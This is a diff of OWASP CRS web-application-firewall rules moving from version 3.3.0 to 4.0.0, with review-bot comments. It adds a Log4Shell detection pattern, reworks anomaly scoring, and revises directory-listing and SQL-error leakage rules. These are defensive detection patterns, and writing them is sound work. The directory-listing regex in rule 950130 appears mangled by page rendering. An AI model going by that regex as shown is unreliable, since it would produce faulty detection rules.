@@ -284,18 +417,46 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:944017,phase:1,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:944018,phase:2,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:944017,phase:1,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:944018,phase:2,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # +# This is a stricter sibling of 944150. +# It simply checks for the existence of `${`, taking into account the same encoding evasions +# as 944150. +# +# Regular expression generated from regex-assembly/944152.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 944152 +# +SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|XML:/*|XML://@* "@rx (?i)(?:\$|$?)(?:\{|&l(?:brace|cub);?)" \ + "id:944152,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,t:jsDecode,t:htmlEntityDecode,\ + log,\ + msg:'Potential Remote Command Execution: Log4j / Log4shell',\ + tag:'application-multi',\ + tag:'language-java',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/137/6',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/4',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" # # -= Paranoia Levels Finished =- diff --git a/rules/REQUEST-949-BLOCKING-EVALUATION.conf b/rules/REQUEST-949-BLOCKING-EVALUATION.conf index 5f370a1664..2358df934e 100644 --- a/rules/REQUEST-949-BLOCKING-EVALUATION.conf +++ b/rules/REQUEST-949-BLOCKING-EVALUATION.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ 
@@ -11,117 +12,207 @@ # -= Paranoia Level 0 (empty) =- (apply unconditionally) # -# Summing up the anomaly score. +# Summing up the blocking and detection anomaly scores in phase 1 +# even when early blocking is disabled, we need to sum up the scores in phase 1 +# this prevents bugs in phase 5 if Apache skips phases because of error handling +# See: https://github.com/coreruleset/coreruleset/issues/2319#issuecomment-1047503932 -# NOTE: tx.anomaly_score should not be set initially, but masking would lead to difficult bugs. -# So we add to it. -SecRule TX:PARANOIA_LEVEL "@ge 1" \ +SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 1" \ + "id:949052,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" +SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \ + "id:949152,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" + +SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \ + "id:949053,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" +SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \ + "id:949153,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" + +SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \ + "id:949054,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" +SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \ + "id:949154,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" + +SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \ + "id:949055,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" +SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \ + "id:949155,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + 
setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" + +# at start of phase 2, we reset the aggregate scores to 0 to prevent duplicate counting of per-PL scores +# this is necessary because the per-PL scores are counted across phases +SecAction \ + "id:949059,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.blocking_inbound_anomaly_score=0'" +SecAction \ + "id:949159,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.detection_inbound_anomaly_score=0'" + +# Summing up the blocking and detection anomaly scores in phase 2 + +SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 1" \ "id:949060,\ phase:2,\ pass,\ t:none,\ nolog,\ - setvar:'tx.anomaly_score=+%{tx.anomaly_score_pl1}'" + setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" +SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \ + "id:949160,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" -SecRule TX:PARANOIA_LEVEL "@ge 2" \ +SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \ "id:949061,\ phase:2,\ pass,\ t:none,\ nolog,\ - setvar:'tx.anomaly_score=+%{tx.anomaly_score_pl2}'" + setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" +SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \ + "id:949161,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" -SecRule TX:PARANOIA_LEVEL "@ge 3" \ +SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \ "id:949062,\ phase:2,\ pass,\ t:none,\ nolog,\ - setvar:'tx.anomaly_score=+%{tx.anomaly_score_pl3}'" + setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" +SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \ + "id:949162,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" -SecRule TX:PARANOIA_LEVEL "@ge 4" \ +SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \ "id:949063,\ phase:2,\ pass,\ t:none,\ 
nolog,\ - setvar:'tx.anomaly_score=+%{tx.anomaly_score_pl4}'" + setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" +SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \ + "id:949163,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" SecMarker "BEGIN-REQUEST-BLOCKING-EVAL" -# These rules use the anomaly score settings specified in the 10 config file. -# You should also set the desired disruptive action (deny, redirect, etc...). # -# -=[ IP Reputation Checks ]=- -# -# Block based on variable IP.REPUT_BLOCK_FLAG and TX.DO_REPUT_BLOCK +# -=[ Anomaly Mode: Overall Transaction Anomaly Score ]=- # -SecRule IP:REPUT_BLOCK_FLAG "@eq 1" \ - "id:949100,\ - phase:2,\ + +# if early blocking is active, check threshold in phase 1 +SecRule TX:BLOCKING_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_threshold}" \ + "id:949111,\ + phase:1,\ deny,\ - log,\ - msg:'Request Denied by IP Reputation Enforcement',\ - logdata:'Previous Block Reason: %{ip.reput_block_reason}',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-ip',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ + t:none,\ + msg:'Inbound Anomaly Score Exceeded in phase 1 (Total Score: %{TX.BLOCKING_INBOUND_ANOMALY_SCORE})',\ + tag:'anomaly-evaluation',\ + ver:'OWASP_CRS/4.0.0',\ chain" - SecRule TX:DO_REPUT_BLOCK "@eq 1" \ - "setvar:'tx.inbound_anomaly_score=%{tx.anomaly_score}'" + SecRule TX:EARLY_BLOCKING "@eq 1" -# -# -=[ Anomaly Mode: Overall Transaction Anomaly Score ]=- -# -SecRule TX:ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_threshold}" \ +# always check threshold in phase 2 +SecRule TX:BLOCKING_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_threshold}" \ "id:949110,\ phase:2,\ deny,\ t:none,\ - log,\ - msg:'Inbound Anomaly Score Exceeded (Total Score: %{TX.ANOMALY_SCORE})',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - 
tag:'attack-generic',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - setvar:'tx.inbound_anomaly_score=%{tx.anomaly_score}'" - - + msg:'Inbound Anomaly Score Exceeded (Total Score: %{TX.BLOCKING_INBOUND_ANOMALY_SCORE})',\ + tag:'anomaly-evaluation',\ + ver:'OWASP_CRS/4.0.0'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:949011,phase:1,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:949012,phase:2,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949011,phase:1,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949012,phase:2,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:949013,phase:1,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:949014,phase:2,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:949013,phase:1,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:949014,phase:2,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:949015,phase:1,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:949016,phase:2,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" 
"id:949015,phase:1,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:949016,phase:2,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:949017,phase:1,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:949018,phase:2,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949017,phase:1,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949018,phase:2,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/RESPONSE-950-DATA-LEAKAGES.conf b/rules/RESPONSE-950-DATA-LEAKAGES.conf index c34607ecc0..dec60c0bf9 100644 --- a/rules/RESPONSE-950-DATA-LEAKAGES.conf +++ b/rules/RESPONSE-950-DATA-LEAKAGES.conf 
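Review bot: 949111 denies in phase 1 only when its chained `SecRule TX:EARLY_BLOCKING "@eq 1"` matches, so an unset `tx.early_blocking` leaves phase-1 blocking silently disabled and defers everything to 949110; that is a safe default, but the rule block should say so — `# tx.early_blocking is expected to be initialised (0/1) in crs-setup; unset means no phase-1 blocking`. The phase-1 summation rules 949052–949055/949152–949155 leave `tx.blocking_inbound_anomaly_score` holding the phase-1 total until 949059 zeroes it at the start of phase 2, so any phase-2 rule evaluated before this file (presumed from file ordering) would read a stale phase-1 value; a note next to 949059 would make that window explicit. Both 949111 and 949110 read `tx.inbound_anomaly_score_threshold` through a macro, and with the removed line about the anomaly score settings living in the config file gone, nothing in this file now points to where the threshold is initialised.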
@@ -1,16 +1,21 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ -# The paranoia level skip rules 950020, 950021 and 950022 have odd -# numbers not in sync with other paranoia level skip rules in other -# files. This is done to avoid rule id collisions with CRSv2. -# This is also true for rule 950130. +# We reused paranoia level skip rules 950010, 950011, and 950018. +# These rule identifiers were in use in CRSv2, so we used different +# identifiers in CRSv3 to avoid conflicts (950020, 950021 and 950022). +# In CRSv4, for the sake of a consistent structure, we use these +# identifiers again, so that the skip rules of PL can be defined in the +# same way for all files. +# Rule id 950130 has been kept - this ID also was introduced at first +# rule to avoid the collision. # # -= Paranoia Level 0 (empty) =- (apply unconditionally) 
@@ -18,23 +23,23 @@ -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:950020,phase:3,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:950021,phase:4,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950011,phase:3,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950012,phase:4,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # # # -=[ Directory Listing ]=- # -SecRule RESPONSE_BODY "@rx (?:<(?:TITLE>Index of.*?Index of.*?Index of|>\[To Parent Directory\]<\/[Aa]>
)" \
+SecRule RESPONSE_BODY "@rx (?:<(?:TITLE>Index of.*?Index of.*?Index of|>\[To Parent Directory\]
)" \ "id:950130,\ phase:4,\ block,\ capture,\ t:none,\ msg:'Directory Listing',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ @@ -43,11 +48,9 @@ SecRule RESPONSE_BODY "@rx (?:<(?:TITLE>Index of.*?Index of.*?Inde tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54/127',\ tag:'PCI/6.5.6',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'ERROR',\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'" + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" # # -=[ CGI Source Code Leakage ]=- @@ -68,7 +71,7 @@ SecRule RESPONSE_BODY "@rx ^#\!\s?/" \ capture,\ t:none,\ msg:'CGI source code leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ 
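Review bot: As rendered, the changed 950130 pattern and its predecessor differ only in the trailing `<\/[Aa]>` fragment of the old line, and the `Index of` alternation appears to have lost its tag fragments as well; this looks like HTML stripping by the page rather than the committed change, so the actual regex should be checked in the repository before concluding that the closing-tag anchor was dropped. The `logdata` change that drops `%{MATCHED_VAR}` is sound for a `RESPONSE_BODY` rule, since the old form could copy the whole response into the error log; a one-line comment — `# logdata deliberately omits MATCHED_VAR: it would echo the entire response body` — would keep it from being re-added later.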
@@ -77,17 +80,15 @@ SecRule RESPONSE_BODY "@rx ^#\!\s?/" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'ERROR',\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'" + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:950013,phase:3,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:950014,phase:4,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:950013,phase:3,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:950014,phase:4,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # # @@ -95,12 +96,12 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:950014,phase:4,pass,nolog,skipAf # SecRule RESPONSE_STATUS "@rx ^5\d{2}$" \ "id:950100,\ - phase:4,\ + phase:3,\ block,\ capture,\ t:none,\ msg:'The Application Returned a 500-Level Status Code',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ 
@@ -109,26 +110,24 @@ SecRule RESPONSE_STATUS "@rx ^5\d{2}$" \ tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/152',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'ERROR',\ - setvar:'tx.outbound_anomaly_score_pl2=+%{tx.error_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.error_anomaly_score}'" + setvar:'tx.outbound_anomaly_score_pl2=+%{tx.error_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:950015,phase:3,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:950016,phase:4,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950015,phase:3,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950016,phase:4,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:950017,phase:3,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:950022,phase:4,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950017,phase:3,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950018,phase:4,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf b/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf index dbba2d7780..37d58d16ef 100644 --- a/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf 
+++ b/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -13,19 +14,19 @@ -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:951011,phase:3,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:951012,phase:4,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:951011,phase:3,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:951012,phase:4,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # # # -=[ SQL Error Leakages ]=- # -# Ref: https://raw.github.com/sqlmapproject/sqlmap/master/xml/errors.xml +# Ref: https://github.com/sqlmapproject/sqlmap # Ref: https://github.com/Arachni/arachni/tree/master/components/checks/active/sql_injection/regexps # -SecRule RESPONSE_BODY "@pmFromFile sql-errors.data" \ +SecRule RESPONSE_BODY "!@pmFromFile sql-errors.data" \ "id:951100,\ phase:4,\ pass,\ 
@@ -35,20 +36,19 @@ SecRule RESPONSE_BODY "@pmFromFile sql-errors.data" \ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-disclosure',\ - tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.sql_error_match=1'" + ver:'OWASP_CRS/4.0.0',\ + skipAfter:END-SQL-ERROR-MATCH-PL1" -SecRule TX:sql_error_match "@eq 1" \ +SecRule RESPONSE_BODY "@rx (?i:JET Database Engine|Access Database Engine|\[Microsoft\]\[ODBC Microsoft Access Driver\])" \ "id:951110,\ phase:4,\ block,\ capture,\ t:none,\ msg:'Microsoft Access SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-msaccess',\ 
@@ -56,24 +56,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i:JET Database Engine|Access Database Engine|\[Microsoft\]\[ODBC Microsoft Access Driver\])" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + +SecRule RESPONSE_BODY "@rx (?i:ORA-[0-9][0-9][0-9][0-9]|java\.sql\.SQLException|Oracle error|Oracle.*Driver|Warning.*oci_.*|Warning.*ora_.*)" \ "id:951120,\ phase:4,\ block,\ capture,\ t:none,\ msg:'Oracle SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-oracle',\ 
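Review bot: The trailing `.*` in `Warning.*oci_.*|Warning.*ora_.*` extends the captured match to the end of the current line, and because the new logdata echoes `%{TX.0}`, whatever follows the token on that line of the response body is written to the error log — the kind of content that dropping `%{MATCHED_VAR}` and `ctl:auditLogParts=+E` in this same hunk was meant to keep out of logs (with PCRE's default dot the capture stops at a newline, but a minified page can be a single line). An unanchored `@rx` matches exactly the same bodies with or without a trailing `.*`, so `Warning.*oci_|Warning.*ora_` detects identically while keeping the logged fragment short. The same trailing `.*` is on the new side of 951210 (`POS[0-9]+.*`, `Warning.*maxdb.*`), 951220 (`Warning.*mssql_.*`), 951240 (`\bpg_.*`), 951250 (`Warning.*sqlite_.*`) and 951260 (`Sybase.*Server message.*`).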
